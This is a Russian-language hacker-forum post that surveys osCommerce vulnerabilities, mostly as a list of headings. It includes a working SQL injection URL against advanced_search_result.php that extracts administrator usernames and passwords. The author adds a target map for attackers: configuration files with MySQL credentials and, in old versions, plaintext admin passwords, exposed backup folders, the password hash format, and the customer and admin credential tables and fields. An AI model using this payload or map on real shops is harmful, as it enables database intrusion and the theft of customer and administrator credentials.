Обзор уязвимостей osCommerce


=== osCommerce 3.0a3 (admin/templates_boxes_layout.php) Directory Traversal Bug Discloses Files to Remote Users ===



=== osCommerce 2.2 Multiple Cross Site Scripting Vulnerability ===

=== osCommerce 2.2 (osCsid) Cross Site Scripting Vulnerability ===

=== osCommerce 2.2 (error_message) Cross Site Scripting Vulnerability ===

=== osCommerce 2.2 (file_manager.php) File Browsing ===



=== osCommerce <= 2.2 (extras/) information/source code disclosure ===

=== osCommerce <=2.2 SQL Injection Vulnerability (create_account_process.php) ===

=== osCommerce <=2.2 (index.php) HTTP Response Splitting ===



=== osCommerce SQL Injection (customer_testimonials.php) ===

=== osCommerce (Contact_us) Cross Site Scripting Vulnerability ===

=== osCommerce (wrapper.php) PHP Including Vulnerability ===

upd:

=== Oscommerce <= 2.2 (advanced_search_result.php) SQL-injection ===
url: advanced_search_result.php?inc_subcat=1&keywords=% 20&categories_id=-1+union+select+1,concat_ws(%27;%27,user_name,user_ password)+from+administrators+limit+1,1--


Напишу еще от меня:

admin/ - админка.

includes/configure.php - здесь хранится данные к mysql, и общие настройки.

admin/configure.php - здесь хранится данные к mysql, и общие настройки. в старых версиях также лежит пароль к админке в открытом виде.

admin/backups/ - здесь хранятся mysql бекапы, не всегда админы ставят правильные права.

md5(salt+plain):salt - в таком виде хранятся пароли в базе.

customers - таблица юзеров.

customers_email_address, customers_password - поля в таблице customers необходимые для авторизации юзеров.

administrator или admin - таблица админов.

admin_email_address, admin_password - поля в таблице administrator необходимые для авторизации админов.

(c) life_is_shit